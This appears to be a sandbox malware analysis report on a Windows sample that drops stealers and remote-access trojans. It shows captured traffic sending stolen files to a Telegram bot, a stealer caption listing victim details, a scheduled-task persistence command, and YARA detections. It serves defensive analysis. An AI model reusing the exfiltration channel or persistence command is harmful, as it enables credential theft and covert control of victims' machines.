e4 ab f8 3a 86 55 8b 58 2e 51 c4 cc 1e 67 9b cc 32 3e 8c 0c 3b b7 69 c2 d4 f2 c0 e4 fa 5d 49 ae 19 f9 f0 a3 67 dc 31 9e c4 09 7f 1b df d0 e2 8f ae ec Data Ascii: i_d""w 7j$h>,)o/TU2qd_lY}x`&Ctr`eX50 )Z-*P-tBH/:3xvsL6pAZ]hE]l;2^AL\|\CJS=4PeUnaX:UX.Qg2>;i]Ig1
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: b3 30 4a 35 9a 4e 2c 68 a0 dd bf 52 f4 f2 49 9a 9b 09 6f 51 f0 69 7e 4e f9 f1 10 99 66 fa cf 0d a5 7a 09 f1 7d d5 b0 25 1c 61 45 a9 de d5 f8 25 98 85 47 b2 a3 8b 85 bc c8 fc d7 e1 18 7d 65 ff 13 e0 5e 55 ec 99 20 f3 20 60 25 11 74 12 80 eb a9 11 be d0 46 e9 bb 22 01 4b 84 91 31 49 17 2a 4b 40 8f 1e f2 e8 73 56 5d 18 93 a5 6b a4 6b 17 e9 f4 86 f4 5b 40 47 03 34 c0 01 92 3d 5d 2b 9c ae 81 29 b8 32 4e 6a a5 15 35 0c e4 e7 fd 24 ee b0 b6 61 de d5 11 d9 75 7b 4d 64 36 d9 17 7c fd fa 4f b5 cc 3a 94 11 91 a7 44 71 88 6b 8b b9 a6 50 12 91 4f 85 6a 1f c5 4e d0 66 42 d4 e8 ac 43 2a d8 32 aa 55 27 85 e3 fc 2a 6d 48 98 10 7f a5 73 ae 36 b9 92 e9 39 14 d2 24 c4 4d ec f5 34 e6 e4 a7 e4 05 b4 76 e7 f5 7e 68 09 78 69 c7 f6 30 6d 8d 41 9b d3 fa 88 6d 48 d9 82 50 05 88 29 Data Ascii: 0J5N,hRIoQi~Nfz}%aE%G}e^U `%tF"K1IK@sV]kk[@G4=]+)2Nj5$au{Md6\|O:DqkPOjNfBC2U'*mHs69$M4v~hxi0mAmHP)
2024-07-06 11:29:08 UTC	1865	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:29:08 GMT Content-Type: application/json Content-Length: 1476 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":121,"from":{"id":7347450494,"is_bot":true,"first_name":"Crypto Factory \ud83e\uddca","username":"CryptoFactory_robot"},"chat":{"id":212019462,"first_name":"BIBIL","username":"BIBIL_0DAY","type":"private"},"date":1720265348,"document":{"file_name":"C UsersuserAppDataRoaming134349@[United States].zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAN5ZokqhL6v_3dFVysObYIrIcZhCx8AAjUTAAIPlVBQHPprI-MoWJc1BA","file_unique_id":"AgADNRMAAg-VUFA","file_size":672450},"caption":"==== RL STEALER ==== \n\u23f0 Date => 07/06/2024 7:28\n\ud83d\udcbbSystem => Windows 10 Pro (64 Bit)\n\ud83d\udc64 User => user\n\ud83c\udd94 PC => 134349\n\ud83c\udff4 Country => [United States]\n\ud83d\udd0d IP => 8.46.123.33\n\ud83d\udcdd Language => \ud83c\udde8\ud83c\udded en-CH\n\ud83d\udd13 Antivirus => Windows Defender.\n ===={ User Data }====\n\ud83d\udcc2 FileGrabber => 81\n\ud83d\udce6 Telegram => \u274c\n\ud83d\udcb8 Wallets => \u274c\n\ud83d\udcac Discord => \u274c\n\ud83d\udce1 FileZilla: [TRUNCATED]

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessInternalW	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessInternalW	INLINE	0xE9 0x90 0x00 0x07 0x75 0x5B

Target ID:	0
Start time:	07:26:55
Start date:	06/07/2024
Path:	C:\Users\user\Desktop\xj40xovMsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\xj40xovMsm.exe"
Imagebase:	0x7ff68a180000
File size:	15'088'640 bytes
MD5 hash:	1082572A44D4C41214A3C38DCD8289F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:27:06
Start date:	06/07/2024
Path:	C:\Windows\System32\relog.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\relog.exe
Imagebase:	0x7ff698010000
File size:	53'760 bytes
MD5 hash:	F445286ECB5A74AAF2C103D05879F1C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:27:08
Start date:	06/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:27:10
Start date:	06/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:27:15
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe"
Imagebase:	0xee0000
File size:	631'296 bytes
MD5 hash:	BED8CDCED2D57BE2BD750F0F59991ECD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 56%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:27:16
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe"
Imagebase:	0x190000
File size:	179'200 bytes
MD5 hash:	68FAD5F5F8DE1C290DF5D3754B4AF358
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
Antivirus matches:	Detection: 96%, ReversingLabs Detection: 74%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:27:17
Start date:	06/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:27:17
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:27:17
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe"
Imagebase:	0x620000
File size:	179'200 bytes
MD5 hash:	68FAD5F5F8DE1C290DF5D3754B4AF358
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
Antivirus matches:	Detection: 96%, ReversingLabs Detection: 74%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:27:19
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe"
Imagebase:	0xac0000
File size:	328'192 bytes
MD5 hash:	43F955115DFBA87CA3593A18EFD58CEF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
Antivirus matches:	Detection: 92%, ReversingLabs Detection: 66%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:27:19
Start date:	06/07/2024
Path:	C:\ProgramData\KMSAuto\accc.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\KMSAuto\accc.exe"
Imagebase:	0x6e0000
File size:	631'296 bytes
MD5 hash:	BED8CDCED2D57BE2BD750F0F59991ECD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 56%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:27:19
Start date:	06/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""
Imagebase:	0x7ff693890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:27:20
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:27:20
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe"
Imagebase:	0x6f0000
File size:	48'640 bytes
MD5 hash:	C709136E78750FEB6CB85F99EDA16629
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:27:20
Start date:	06/07/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 7
Imagebase:	0x7ff6b1a20000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:27:20
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe"
Imagebase:	0x30000
File size:	48'640 bytes
MD5 hash:	C709136E78750FEB6CB85F99EDA16629
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:27:23
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe"
Imagebase:	0x620000
File size:	64'512 bytes
MD5 hash:	E52BA92D25281E90AA7F27BD3719951F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: ditekSHen
Reputation:	low
